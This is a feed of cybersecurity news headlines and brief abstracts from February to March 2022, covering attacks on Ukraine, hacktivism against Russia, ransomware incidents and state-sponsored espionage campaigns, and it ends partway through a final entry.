Ukraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware.BleepingComputer
March 14, 2022
China-based TA416 Ramp-Up Espionage Against European Governments Full Text
Abstract
A Chinese-backed threat group has been observed targeting European diplomatic entities involved in refugee and migrant services. The group takes advantage of web bugs to profile its targets. An analysis revealed that the threat group is using an updated version of PlugX malware. To stay protected, ...Cyware Alerts - Hacker News
March 14, 2022
New CaddyWiper data wiping malware hits Ukrainian networks Full Text
Abstract
Newly discovered data-destroying malware was observed earlier today in attacks targeting Ukrainian organizations and deleting data across systems on compromised networks.BleepingComputer
March 14, 2022
Hackers Target German Branch of Russian Oil Giant Rosneft Full Text
Abstract
The German subsidiary of Russian energy giant Rosneft has been hit by a cyberattack, the Federal Office for Information Security (BSI) said on Monday, with hacker group Anonymous claiming responsibility.Security Week
March 14, 2022
Anonymous claims to have hacked German subsidiary of Russian energy giant Rosneft Full Text
Abstract
Anonymous claims to have hacked the systems of the German subsidiary of Russian energy giant Rosneft and stolen 20TB of data. The Anonymous hacker collective claimed to have hacked the German branch of the Russian energy giant Rosneft. In hacktivists...Security Affairs
March 14, 2022
Brazilian trojan impacting Portuguese users and using the same capabilities seen in other Latin American threats Full Text
Abstract
The malware takes advantage of a template from the Portuguese Tax services (Autoridade Tributária e Aduaneira) to disseminate the threat in the wild. Maxtrilha uses the same templates to target users.Security Affairs
March 14, 2022
Automotive giant DENSO hit by new Pandora ransomware gang Full Text
Abstract
DENSO has published an announcement to confirm that its German business computer network was accessed by an unauthorized third party on March 10, 2022, resulting in a data breach.BleepingComputer
March 13, 2022
Anonymous sent a message to Russians: “remove Putin” Full Text
Abstract
Anonymous has published a new message for Russian citizens inviting them to remove Putin, who is sacrificing them and killing Ukrainians. The hacker collective Anonymous has published a new message for Russians inviting them to wake up and remove...Security Affairs
March 12, 2022
Attackers use website contact forms to spread BazarLoader malware Full Text
Abstract
Threat actors are spreading the BazarLoader malware via website contact forms to evade detection, researchers warn. Researchers from cybersecurity firm Abnormal Security observed threat actors spreading the BazarLoader/BazarBackdoor malware via website...Security Affairs
March 12, 2022
Anonymous Hacks Russian Media Censoring Agency Roskomnadzor Full Text
Abstract
The international hacktivist collective Anonymous has struck again, and this time the group is claiming to have hacked Roskomnadzor, a major Russian federal agency. The group also claims to have stolen over 360,000 files.Hackread
March 10, 2022
Iranian Hackers Targeting Turkey and Arabian Peninsula in New Malware Campaign Full Text
Abstract
The Iranian state-sponsored threat actor known as MuddyWater has been attributed to a new swarm of attacks targeting Turkey and the Arabian Peninsula with the goal of deploying remote access trojans (RATs) on compromised systems. "The MuddyWater supergroup is highly motivated and can use unauthorized access to conduct espionage, intellectual property theft, and deploy ransomware and destructive malware in an enterprise," Cisco Talos researchers Asheer Malhotra, Vitor Ventura, and Arnaud Zobec said in a report published today. The group, which has been active since at least 2017, is known for its attacks on various sectors that help further advance Iran's geopolitical and national security objectives. In January 2022, the U.S. Cyber Command attributed the actor to the country's Ministry of Intelligence and Security (MOIS). MuddyWater is also believed to be a "conglomerate of multiple teams operating independently rather than a single threat actor group,"The Hacker News
March 9, 2022
NVIDIA’s Code Signing Certificates Stolen and Abused in Attacks Full Text
Abstract
Lapsus$, responsible for the recent attack on Nvidia, reportedly released two of the company's old code-signing certificates, and threat actors have started abusing them. In some cases, the stolen certificates were used to sign Cobalt Strike beacons, Mimikatz, backdoors, and remote access trojans. Ad ...Cyware Alerts - Hacker News
March 9, 2022
Multiple Russian government websites hacked in a supply chain attack Full Text
Abstract
Threat actors hacked Russian federal agencies' websites in a supply chain attack involving the compromise of a stats widget. Some Russian federal agencies' websites were compromised in a supply chain attack, threat actors compromised the stats widget...Security Affairs
March 9, 2022
Anonymous hacked Russian cams, websites, announced a clamorous leak Full Text
Abstract
The collective Anonymous has hacked public cameras in Russia and transmitted their live feed on a website; it also announced a clamorous leak. Anonymous and other hacker groups continue to target Russia; in a recent attack the collective has taken...Security Affairs
March 09, 2022
Russian government sites hacked in supply chain attack Full Text
Abstract
Russia says some of its federal agencies' websites were compromised on Tuesday after unknown attackers hacked the stats widget used to track the number of visitors by multiple government agencies.BleepingComputer
March 9, 2022
New attack bypasses hardware defenses for Spectre flaw in Intel and ARM CPUs Full Text
Abstract
It is an extension of the 2017 Spectre version 2 attack, also known as Spectre-BTI (Branch Target Injection) and, just like Spectre v2, can result in the leak of sensitive information from the privileged kernel memory space.CSO Online
March 08, 2022
Google: Chinese hackers target Gmail users affiliated with US govt Full Text
Abstract
Google's Threat Analysis Group has warned multiple Gmail users that they were targeted in phishing attacks conducted by a Chinese-backed hacking group tracked as APT31.BleepingComputer
March 7, 2022
Novel Attack Turns Amazon Devices Against Themselves Full Text
Abstract
Researchers have discovered how to remotely manipulate the Amazon Echo through its own speakers.Threatpost
March 7, 2022
Anonymous hacked Russian streaming services to broadcast war footage Full Text
Abstract
Anonymous hacked into the most popular Russian streaming services to broadcast war footage from Ukraine. The popular hacker collective Anonymous continues to target Russian entities, a few hours ago the group hacked into the most popular Russian streaming...Security Affairs
March 07, 2022
Rompetrol gas station network hit by Hive ransomware Full Text
Abstract
Romania's Rompetrol gas station network has been hit by a ransomware attack. Rompetrol, owned by KMG International announced today that it was battling a "complex cyberattack." BleepingComputer has learned that the Hive ransomware gang is behind this attack.BleepingComputer
March 6, 2022
Charities and NGOs providing support in Ukraine hit by malware Full Text
Abstract
Malware-based attacks are targeting charities and non-governmental organizations (NGOs) providing support in Ukraine. Charities and non-governmental organizations (NGOs) that in these weeks are providing support in Ukraine are targeted by malware attacks...Security Affairs
March 5, 2022
European Officials Aiding the Ukrainian Refugee Movement are Under Attack Full Text
Abstract
Security researchers found a campaign, dubbed Asylum Ambuscade, targeting European government personnel helping Ukrainian refugees with attachments containing the SunSeed malware. The attachment uses the Emergency Meeting of the NATO Security Council as a lure. To stay protected, victims are urge ...Cyware Alerts - Hacker News
March 5, 2022
RuRAT Campaign Uses Innovative Lure to Target Potential Victims Full Text
Abstract
BleepingComputer spotted a spear-phishing campaign impersonating a venture capital firm to infect victims with RuRAT malware and gain initial access to the targeted systems. The phishing email originates from an IP address belonging to a U.K. virtual server company. Experts recommend always staying alert whene ...Cyware Alerts - Hacker News
March 5, 2022
Elon Musk warns of possible targeted attacks on Starlink in Ukraine Full Text
Abstract
SpaceX chief Elon Musk has expressed his concerns over the future of SpaceX's Starlink service in Ukraine, given the current scenario of uncertainty in the country following the Russian invasion.Hackread
March 04, 2022
Amazon: Charities, aid orgs in Ukraine attacked with malware Full Text
Abstract
Charities and non-governmental organizations (NGOs) providing critical support in Ukraine are targeted in malware attacks aiming to disrupt their operations and relief efforts seeking to assist those affected by Russia's war.BleepingComputer
March 03, 2022
Malware campaign impersonates VC firm looking to buy sites Full Text
Abstract
BleepingComputer was recently contacted by an alleged "venture capitalist" firm that wanted to invest or purchase our site. However, as we later discovered, this was a malicious campaign designed to install malware that provides remote access to our devices.BleepingComputer
March 03, 2022
Ukraine cyber group to strike at Russia’s critical infrastructure Full Text
Abstract
A Ukrainian cyber guerrilla warfare group is planning to strike back against Russia, targeting the country’s critical infrastructure amid the Russian invasion of Ukraine.The Hill
March 03, 2022
Ukraine says local govt sites hacked to push fake capitulation news Full Text
Abstract
The Security Service of Ukraine (SSU) said today "enemy" hackers are using compromised local government and regional authorities' websites to push rumors that Ukraine surrendered and signed a peace treaty with Russia.BleepingComputer
March 3, 2022
Ukrainian WordPress sites under massive complex attacks Full Text
Abstract
Researchers observed a spike in the attacks against Ukrainian WordPress sites since the beginning of the military invasion of the country. Cyber attacks are an important component of the military strategy against Ukraine; experts observed a spike...Security Affairs
March 02, 2022
Hackers Try to Target European Officials to Get Info on Ukrainian Refugees, Supplies Full Text
Abstract
Details of a new nation-state sponsored phishing campaign have been uncovered setting its sights on European governmental entities in what's seen as an attempt to obtain intelligence on refugee and supply movement in the region. Enterprise security company Proofpoint, which detected the malicious emails for the first time on February 24, 2022, dubbed the social engineering attacks "Asylum Ambuscade." "The email included a malicious macro attachment which utilized social engineering themes pertaining to the Emergency Meeting of the NATO Security Council held on February 23, 2022," researchers Michael Raggi and Zydeca Cass said in a report published Tuesday. "The email also contained a malicious attachment which attempted to download malicious Lua malware named SunSeed and targeted European government personnel tasked with managing transportation and population movement in Europe." The findings build on an advisory issued by the State ServiceThe Hacker News
March 2, 2022
NVIDIA discloses data breach after the recent ransomware attack Full Text
Abstract
Chipmaker giant Nvidia confirmed a data breach after the recently disclosed security incident, with proprietary information stolen. The chipmaker giant Nvidia was recently the victim of a ransomware attack that impacted some of its systems for two days. The security...Security Affairs
March 2, 2022
WordPress-hosted Ukrainian University Websites Hacked in Targeted Attacks Full Text
Abstract
The group, whose members refer to themselves as 'the Mx0nday', has targeted the WordPress-hosted sites more than 100,000 times since February 24, when Russian troops officially invaded Ukraine.The Daily Swig
March 2, 2022
Anonymous and its affiliates continue to cause damage to Russia Full Text
Abstract
The massive operation launched by the Anonymous collective against Russia for its illegitimate invasion continues. The popular collective Anonymous, and its affiliates, relentlessly continue their offensive against Russian targets. In the last few hours,...Security Affairs
March 1, 2022
Ukraine Hit with Novel ‘FoxBlade’ Trojan Hours Before Invasion Full Text
Abstract
Microsoft detected cyberattacks launched against Ukraine hours before Russia’s tanks and missiles began to pummel the country last week.Threatpost
March 1, 2022
Microsoft Accounts Targeted by Russian-Themed Credential Harvesting Full Text
Abstract
Malicious emails warning Microsoft users of "unusual sign-on activity" from Russia are looking to capitalize on the Ukrainian crisis.Threatpost
March 01, 2022
Second New ‘IsaacWiper’ Data Wiper Targets Ukraine After Russian Invasion Full Text
Abstract
A new data wiper malware has been observed deployed against an unnamed Ukrainian government network, a day after destructive cyber attacks struck multiple entities in the country preceding the start of Russia's military invasion. Slovak cybersecurity firm ESET dubbed the new malware "IsaacWiper," which it said was detected on February 24 in an organization that was not affected by HermeticWiper (aka FoxBlade), another data wiping malware that targeted several organizations on February 23 as part of a sabotage operation aimed at rendering the machines inoperable. Further analysis of the HermeticWiper attacks, which infected at least five Ukrainian organizations, has revealed a worm constituent that propagates the malware across the compromised network and a ransomware module that acts as a "distraction from the wiper attacks," corroborating a prior report from Symantec. "These destructive attacks leveraged at least three components: HermeticWiperThe Hacker News
March 01, 2022
Microsoft Finds FoxBlade Malware Hit Ukraine Hours Before Russian Invasion Full Text
Abstract
Update: It's worth noting that the malware Microsoft tracks as FoxBlade is the same as the data wiper that's been denominated HermeticWiper (aka KillDisk). Microsoft on Monday disclosed that it detected a new round of offensive and destructive cyberattacks directed against Ukraine's digital infrastructure hours before Russia launched its first missile strikes last week. The intrusions involved the use of a never-before-seen malware package dubbed FoxBlade, according to the tech giant's Threat Intelligence Center (MSTIC), noting that it added new signatures to its Defender anti-malware service to detect the exploit within three hours of the discovery. "These recent and ongoing cyberattacks have been precisely targeted, and we have not seen the use of the indiscriminate malware technology that spread across Ukraine's economy and beyond its borders in the 2017 NotPetya attack," Microsoft's President and Vice Chair, Brad Smith, said. AdditionThe Hacker News
March 01, 2022
China-linked Daxin Malware Targeted Multiple Governments in Espionage Attacks Full Text
Abstract
A previously undocumented espionage tool has been deployed against selected governments and other critical infrastructure targets as part of a long-running espionage campaign orchestrated by China-linked threat actors since at least 2013. Broadcom's Symantec Threat Hunter team characterized the backdoor, named Daxin, as a technologically advanced malware, allowing the attackers to carry out a variety of communications and information-gathering operations aimed at entities in the telecom, transportation, and manufacturing sectors that are of strategic interest to China. "Daxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enables remote actors to communicate with secured devices not connected directly to the internet," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an independent advisory. The implant takes the form of a Windows kernel driver that implements an elaborThe Hacker News
March 01, 2022
New worm and data wiper malware seen hitting Ukrainian networks Full Text
Abstract
Newly discovered malware was deployed in destructive attacks against Ukrainian organizations and governmental networks before and after Russia invaded the country on February 24.BleepingComputer
March 01, 2022
Reality Winner’s Twitter account was hacked to target journalists Full Text
Abstract
The Twitter account of former intelligence specialist Reality Winner was hacked over the weekend by threat actors looking to target journalists at prominent media organizations. After taking over Winner's verified Twitter account, hackers changed the profile name to "Feedback Team" to impersonate Twitter staff and began sending out DMs.BleepingComputer
March 1, 2022
FoxBlade malware targeted Ukrainian networks hours before Russia’s invasion Full Text
Abstract
Microsoft revealed that Ukrainian entities were targeted with a previously undetected malware, dubbed FoxBlade, several hours before the invasion. The Microsoft Threat Intelligence Center (MSTIC) continues to investigate the attacks that are targeting...Security Affairs
February 28, 2022
Axis Communications shares details on disruptive cyberattack Full Text
Abstract
Axis Communications has published a post mortem about a cyberattack that caused severe disruption in their systems, with some systems still partially offline.BleepingComputer
February 28, 2022
Microsoft: Ukraine hit with new FoxBlade malware hours before invasion Full Text
Abstract
Microsoft said that Ukrainian networks were targeted with newly found malware several hours before Russia's invasion of Ukraine on February 24th.BleepingComputer
February 28, 2022
UNC2596 Deploys Cuba Ransomware via Microsoft Exchange Server Vulnerabilities Full Text
Abstract
According to Mandiant, UNC2596 has been launching such campaigns since August 2021. It has targeted utility providers, government agencies, and organizations that support non-profits and healthcare entities.Cyware Alerts - Hacker News
February 28, 2022
Defense Contractors Under Attack Using New SockDetour Backdoor Full Text
Abstract
The backdoor is associated with an APT campaign named TiltedTemple (aka DEV-0322). Recently, four defense contractors were targeted and one was compromised.Cyware Alerts - Hacker News
February 28, 2022
Ukraine says its ‘IT Army’ has taken down key Russian sites Full Text
Abstract
Key Russian websites and state online portals have been taken offline by attacks claimed by the Ukrainian cyber police force, which now openly engages in cyber-warfare.BleepingComputer
February 28, 2022
Insurance giant AON hit by a cyberattack over the weekend Full Text
Abstract
Professional services and insurance giant AON has suffered a cyberattack that impacted a "limited" number of systems.BleepingComputer
February 27, 2022
Chipmaker giant Nvidia hit by a ransomware attack Full Text
Abstract
The chipmaker giant Nvidia was the victim of a ransomware attack that took down some of its systems for two days. The chipmaker giant Nvidia was the victim of a ransomware attack that impacted some of its systems for two days. The security breach is not connected...Security Affairs
February 26, 2022
Anonymous hacked the Russian Defense Ministry and is targeting Russian companies Full Text
Abstract
Anonymous collective has hacked the Russian Defense Ministry and leaked the data of its employees in response to the Ukraine invasion. A few hours after the Anonymous collective has called to action against Russia following the illegitimate invasion...Security Affairs
February 26, 2022
Nvidia confirms it’s investigating an ‘incident,’ reportedly a cyberattack Full Text
Abstract
Nvidia confirmed that it was investigating an “incident” — hours after media reported that the graphics chipmaking giant had experienced a devastating cyberattack that “completely compromised” the company’s internal systems over the past two days.The Verge
February 25, 2022
GPU giant Nvidia is investigating a potential cyberattack Full Text
Abstract
US chipmaker giant Nvidia confirmed today it's currently investigating an "incident" that reportedly took down some of its systems for two days.BleepingComputer
February 25, 2022
Iran’s MuddyWater Hacker Group Using New Malware in Worldwide Cyber Attacks Full Text
Abstract
Cybersecurity agencies from the U.K. and the U.S. have laid bare a new malware used by the Iranian government-sponsored advanced persistent threat (APT) group in attacks targeting government and commercial networks worldwide. "MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors," the agencies said. The joint advisory comes courtesy of the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the U.K.'s National Cyber Security Centre (NCSC). The cyberespionage actor was outed this year as conducting malicious operations as part of Iran's Ministry of Intelligence and Security (MOIS) targeting a wide range of government and private-sector organizations, including telecommunications, defense, local government, and oil and natural gas sectors, in Asia, AfricThe Hacker News
February 25, 2022
Russian Sandworm Distributes New Cyclops Blink Malware Full Text
Abstract
The U.S. and U.K. released a joint security advisory warning that Russian-backed Sandworm has started using a new malware, dubbed Cyclops Blink. The group has mostly deployed Cyclops Blink to WatchGuard devices. The joint advisory recommends referring to indicators of compromise and provides gui ... Read MoreCyware Alerts - Hacker News
February 25, 2022
Anonymous launched its offensive on Russia in response to the invasion of Ukraine Full Text
Abstract
The popular collective Anonymous declared war on Russia for the illegitimate invasion of Ukraine and announced a series of cyber attacks, calling its members to action. The Anonymous collective is calling to action against Russia following the illegitimate...Security Affairs
February 24, 2022
Cyberattackers Leverage DocuSign to Steal Microsoft Outlook Logins Full Text
Abstract
A targeted phishing attack takes aim at a major U.S. payments company.Threatpost
February 24, 2022
US defense contractors hit by stealthy SockDetour Windows backdoor Full Text
Abstract
A new custom malware dubbed SockDetour found on systems belonging to US defense contractors has been used as a backup backdoor to maintain access to compromised networks.BleepingComputer
February 24, 2022
Microsoft Exchange servers hacked to deploy Cuba ransomware Full Text
Abstract
The Cuba ransomware operation is exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices.BleepingComputer
February 24, 2022
Data wiper attacks on Ukraine were planned at least in November and used ransomware as decoy Full Text
Abstract
Experts reported that the wiper attacks that yesterday hit hundreds of systems in Ukraine used a GoLang-based ransomware decoy. Yesterday, researchers from cybersecurity firms ESET and Broadcom’s Symantec discovered a new data...Security Affairs
February 24, 2022
Defense contractors hit by stealthy SockDetour Windows backdoor Full Text
Abstract
A new custom malware dubbed SockDetour found on systems belonging to US defense contractors has been used as a backup backdoor to maintain access to compromised networks.BleepingComputer
February 24, 2022
Ransomware used as decoy in data-wiping attacks on Ukraine Full Text
Abstract
The new data wiper malware deployed on Ukrainian networks in destructive attacks on Wednesday right before Russia invaded Ukraine earlier today was, in some cases, accompanied by a GoLang-based ransomware decoy.BleepingComputer
February 23, 2022
Sextortion Rears Its Ugly Head Again Full Text
Abstract
Attackers are sending email blasts with malware links in embedded PDFs as a way to evade email filters, lying about having fictional "video evidence."Threatpost
February 23, 2022
New data-wiping malware used in destructive attacks on Ukraine Full Text
Abstract
Cybersecurity firms have found a new data wiper used in destructive attacks today against Ukrainian networks just as Russia moves troops into regions of Ukraine.BleepingComputer
February 23, 2022
Kostovite, Petrovite, and Erythrite Hacking Groups are Striking Industrial, Operational Technology Systems Full Text
Abstract
Three new threat groups targeting firms in the industrial sector have appeared but over half of all attacks are the work of only two known cybercriminal outfits, researchers say.ZDNet
February 23, 2022
DeadBolt ransomware now targets ASUSTOR devices, asks 50 BTC for master key Full Text
Abstract
The DeadBolt ransomware is now targeting ASUSTOR NAS devices by encrypting files and demanding a $1,150 ransom in bitcoins.BleepingComputer
February 23, 2022
Iranian Broadcaster IRIB hit by wiper malware Full Text
Abstract
Iranian national media corporation, Islamic Republic of Iran Broadcasting (IRIB), was hit by a wiper malware in late January 2022. An investigation into the attack that hit the Islamic Republic of Iran Broadcasting (IRIB) in late January, revealed...Security Affairs
February 22, 2022
Threat actors target poorly protected Microsoft SQL Servers Full Text
Abstract
Threat actors install Cobalt Strike beacons on vulnerable Microsoft SQL Servers to achieve a foothold in the target network. Researchers from AhnLab's ASEC spotted a new wave of attacks deploying Cobalt Strike beacons on vulnerable Microsoft SQL Servers...Security Affairs
February 22, 2022
Vulnerable Microsoft SQL Servers targeted with Cobalt Strike Full Text
Abstract
Threat analysts have observed a new wave of attacks installing Cobalt Strike beacons on vulnerable Microsoft SQL Servers, leading to deeper infiltration and subsequent malware infections.BleepingComputer
February 22, 2022
Cookware giant Meyer Corporation discloses cyberattack Full Text
Abstract
US cookware distributor giant Meyer Corporation discloses a data breach that affected thousands of its employees. Meyer Corporation, the second-largest cookware distributor globally, has disclosed a data breach that affects thousands of its employees. The...Security Affairs
February 22, 2022
Chinese Hackers Target Taiwan’s Financial Trading Sector with Supply Chain Attack Full Text
Abstract
An advanced persistent threat (APT) group operating with objectives aligned with the Chinese government has been linked to an organized supply chain attack on Taiwan's financial sector. The attacks are said to have first commenced at the end of November 2021, with the intrusions attributed to a threat actor tracked as APT10, also known as Stone Panda, the MenuPass group, and Bronze Riverside, and known to be active since at least 2009. The second wave of attacks hit a peak between February 10 and 13, 2022, according to a new report published by Taiwanese cybersecurity firm CyCraft, which said the wide-ranging supply chain compromise specifically targeted the software systems of financial institutions, resulting in "abnormal cases of placing orders." The infiltration activity, codenamed "Operation Cache Panda," exploited a vulnerability in the web management interface of the unnamed securities software that has a market share of over 80% in Taiwan, usiThe Hacker News
February 22, 2022
A cyber attack heavily impacted operations of Expeditors International Full Text
Abstract
American worldwide logistics and freight forwarding company Expeditors International shuts down global operations after a cyber attack. American logistics and freight forwarding company Expeditors International was hit by a cyberattack over the weekend...Security Affairs
February 21, 2022
Hackers Backdoor Unpatched Microsoft SQL Database Servers with Cobalt Strike Full Text
Abstract
Vulnerable internet-facing Microsoft SQL (MS SQL) Servers are being targeted by threat actors as part of a new campaign to deploy the Cobalt Strike adversary simulation tool on compromised hosts. "Attacks that target MS SQL servers include attacks to the environment where its vulnerability has not been patched, brute forcing, and dictionary attack against poorly managed servers," South Korean cybersecurity company AhnLab Security Emergency Response Center (ASEC) said in a report published Monday. Cobalt Strike is a commercial, full-featured penetration testing framework that allows an attacker to deploy an agent named "Beacon" on the victim machine, granting the operator remote access to the system. Although billed as a red team threat simulation platform, cracked versions of the software have been actively used by a wide range of threat actors. Intrusions observed by ASEC involve the unidentified actor scanning port 1433 to check for exposed MS SQL sThe Hacker News
February 21, 2022
Iranian State Broadcaster IRIB Hit by Destructive Wiper Malware Full Text
Abstract
An investigation into the cyberattack targeting Iranian national media corporation, Islamic Republic of Iran Broadcasting (IRIB), in late January 2022 has found that it involved the deployment of a wiper malware and other custom implants, as the country's national infrastructure continues to face a wave of attacks aimed at inflicting serious damage. "This indicates that the attackers' aim was also to disrupt the state's broadcasting networks, with the damage to the TV and radio networks possibly more serious than officially reported," Tel Aviv-based cybersecurity firm Check Point said in a report published last week. The 10-second attack, which took place on January 27, involved the breach of state broadcaster IRIB to air pictures of Mujahedin-e-Khalq Organization (MKO) leaders Maryam and Massoud Rajavi alongside a call for the assassination of the Supreme Leader Ayatollah Ali Khamenei. "This is an extremely complex attack and only the owners of this technologyThe Hacker News
February 21, 2022
Cookware giant Meyer discloses cyberattack that impacted employees Full Text
Abstract
Meyer Corporation, the largest cookware distributor in the U.S., and the second-largest globally, has informed U.S. Attorney General offices of a data breach affecting thousands of its employees.BleepingComputer
February 21, 2022
New Xenomorph Android malware targets customers of 56 banks Full Text
Abstract
A new malware called Xenomorph distributed through Google Play Store has infected more than 50,000 Android devices to steal banking information.BleepingComputer
February 20, 2022
New phishing campaign targets Monzo online-banking customers Full Text
Abstract
Users of Monzo, one of the UK's most popular digital-only banking platforms, are being targeted by phishing messages supported by a growing network of malicious websites.BleepingComputer
February 20, 2022
Hackers Target Microsoft Teams Users in Chats Full Text
Abstract
Cybercriminals are planting maldocs in chat threads on Microsoft Teams. Users who open them might end up giving control of their systems to hackers. Organizations are suggested to deploy email gateway security that secures communication applications, and employees should contact IT whenever a suspic ... Read MoreCyware Alerts - Hacker News
February 19, 2022
Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign Full Text
Abstract
One of the more common infections seen is site-wide redirects to spam and scam sites, achieved by attackers exploiting newly found vulnerabilities in popular WordPress plugins.Sucuri
February 18, 2022
Iranian hackers target VMware Horizon servers with Log4j exploits Full Text
Abstract
An Iranian-aligned hacking group tracked as TunnelVision was spotted exploiting Log4j on VMware Horizon servers to breach corporate networks in the Middle East and the United States.BleepingComputer
February 17, 2022
Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware Full Text
Abstract
A "potentially destructive actor" aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability to infect unpatched VMware Horizon servers with ransomware. Cybersecurity firm SentinelOne dubbed the group "TunnelVision" owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker Phosphorus as well as Charming Kitten and Nemesis Kitten. "TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions," SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report, with the intrusions detected in the Middle East and the U.S. Also observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw (CVE-2018-13379) and the Microsoft Exchange ProxyShell vulnerability to gain initial access into the target networks for post-exploitation. "TunnelVisThe Hacker News
February 17, 2022
Threat actors leverage Microsoft Teams to spread malware Full Text
Abstract
Attackers compromise Microsoft Teams accounts to attach malicious executables to chat and spread them to participants in the conversation. While the popularity of Microsoft Teams continues to grow, with roughly 270 million monthly active users, threat...Security Affairs
February 17, 2022
Nation-state actors hacked Red Cross exploiting a Zoho bug Full Text
Abstract
The International Committee of the Red Cross (ICRC) said attackers that breached its network last month exploited a Zoho bug. The International Committee of the Red Cross (ICRC) revealed that the attack that breached its network in January was conducted...Security Affairs
February 16, 2022
Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry Full Text
Abstract
The phishing attacks are spoofing LinkedIn to target ‘Great Resignation’ job hunters, who are also being preyed on by huge data-scraping bot attacks.Threatpost
February 16, 2022
Emotet Now Spreading Through Malicious Excel Files Full Text
Abstract
An ongoing malicious email campaign that includes macro-laden files and multiple layers of obfuscation has been active since late December.Threatpost
February 16, 2022
Moses Staff Hackers Targeting Israeli Organizations for Cyber Espionage Full Text
Abstract
The politically motivated Moses Staff hacker group has been observed using a custom multi-component toolset with the goal of carrying out espionage against its targets as part of a new campaign that exclusively singles out Israeli organizations. First publicly documented in late 2021, Moses Staff is believed to be sponsored by the Iranian government, with attacks reported against entities in Israel, Italy, India, Germany, Chile, Turkey, the U.A.E., and the U.S. Earlier this month, the hacker collective was observed incorporating a previously undocumented remote access trojan (RAT) called "StrifeWater" that masquerades as the Windows Calculator app to evade detection. "Close examination reveals that the group has been active for over a year, much earlier than the group's first official public exposure, managing to stay under the radar with an extremely low detection rate," findings from FortiGuard Labs reveal. The latest threat activity involves an aThe Hacker News
February 16, 2022
US says Russian hackers targeted defense contractors Full Text
Abstract
The U.S. intelligence community says that Russian-sponsored actors have been targeting defense contractors for at least the past two years and in some cases have gained access to sensitive information.The Hill
February 15, 2022
SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming Full Text
Abstract
SquirrelWaffle attackers now use typosquatting to keep sending spam, even after Exchange servers are patched for ProxyLogon/ProxyShell.Threatpost
February 15, 2022
Hillicon Valley — Cyberattack hits Ukrainian defense Full Text
Abstract
Today is Tuesday. Welcome to Hillicon Valley, detailing all you need to know about tech and cyber news from Capitol Hill to Silicon Valley. Subscribe here: thehill.com/newsletter-signup.The Hill
February 15, 2022
Researchers Link ShadowPad Malware Attacks to Chinese Ministry and PLA Full Text
Abstract
Cybersecurity researchers have detailed the inner workings of ShadowPad, a sophisticated and modular backdoor that has been adopted by a growing number of Chinese threat groups in recent years, while also linking it to the country's civilian and military intelligence agencies. "ShadowPad is decrypted in memory using a custom decryption algorithm," researchers from Secureworks said in a report shared with The Hacker News. "ShadowPad extracts information about the host, executes commands, interacts with the file system and registry, and deploys new modules to extend functionality." ShadowPad is a modular malware platform sharing noticeable overlaps to the PlugX malware and which has been put to use in high-profile attacks against NetSarang, CCleaner, and ASUS, causing the operators to shift tactics and update their defensive measures. While initial campaigns that delivered ShadowPad were attributed to a threat cluster tracked as Bronze Atlas aka BariumThe Hacker News
February 15, 2022
Ukraine: Military defense agencies and banks hit by cyberattacks Full Text
Abstract
Ukraine's defense agencies and two state-owned banks were hit by Distributed Denial-of-Service (DDoS) attacks. The Ministry of Defense and the Armed Forces of Ukraine and state-owned banks, Privatbank (Ukraine's largest bank) and Oschadbank...Security Affairs
February 15, 2022
Ukraine Defense Ministry, banks hit by cyberattack amid tensions with Russia Full Text
Abstract
Ukraine’s Ministry of Defense on Tuesday said it had been hit with a cyberattack amid heightened tensions with Russia and concerns Moscow could launch aggressive actions against the country, including a potential ground invasion.The Hill
February 15, 2022
BlackCat gang claimed responsibility for Swissport ransomware attack Full Text
Abstract
The BlackCat ransomware group (aka ALPHV) claimed responsibility for the attack on Swissport that interfered with its operations. The BlackCat ransomware group (aka ALPHV) has claimed responsibility for the cyberattack on Swissport...Security Affairs
February 14, 2022
BlackByte Tackles the SF 49ers & US Critical Infrastructure Full Text
Abstract
Hours before the Superbowl and two days after the FBI warned about the ransomware gang, BlackByte leaked what are purportedly the NFL team’s files.Threatpost
February 14, 2022
New Chrome 0-Day Bug Under Active Attack – Update Your Browser ASAP! Full Text
Abstract
Google on Monday rolled out fixes for eight security issues in the Chrome web browser, including a high-severity vulnerability that's being actively exploited in real-world attacks, marking the first zero-day patched by the internet giant in 2022. The shortcoming, tracked as CVE-2022-0609, is described as a use-after-free vulnerability in the Animation component that, if successfully exploited, could lead to corruption of valid data and the execution of arbitrary code on affected systems. "Google is aware of reports that an exploit for CVE-2022-0609 exists in the wild," the company said in a characteristically brief statement acknowledging active exploitation of the flaw. Credited with discovering and reporting the flaw are Adam Weidemann and Clément Lecigne of Google's Threat Analysis Group (TAG). Also addressed by Google are four other use-after-free flaws impacting File Manager, File Manager, ANGLE, and GPU, a heap buffer overflow bug in Tab Groups, an inteThe Hacker News
February 14, 2022
SSU: Russia-linked actors are targeting Ukraine with ‘massive wave of hybrid warfare’ Full Text
Abstract
The Security Service of Ukraine (SSU) said the country is the target of an ongoing "wave of hybrid warfare." The Security Service of Ukraine (SSU) today revealed the country is the target of an ongoing "wave of hybrid warfare" conducted by Russia-linked...Security Affairs
February 14, 2022
Ukraine says it’s targeted by ‘massive wave of hybrid warfare’ Full Text
Abstract
The Security Service of Ukraine (SSU) today said the country is the target of an ongoing "wave of hybrid warfare," aiming to instill anxiety and undermine Ukrainian society's confidence in the state's ability to defend its citizens.BleepingComputer
February 14, 2022
Sports brand Mizuno hit with ransomware attack delaying orders Full Text
Abstract
Sports equipment and sportswear brand Mizuno is affected by phone outages and order delays after being hit by ransomware, BleepingComputer has learned from sources familiar with the attack.BleepingComputer
February 14, 2022
Europe’s Largest Car Dealer Faces Hive Ransomware Attack Full Text
Abstract
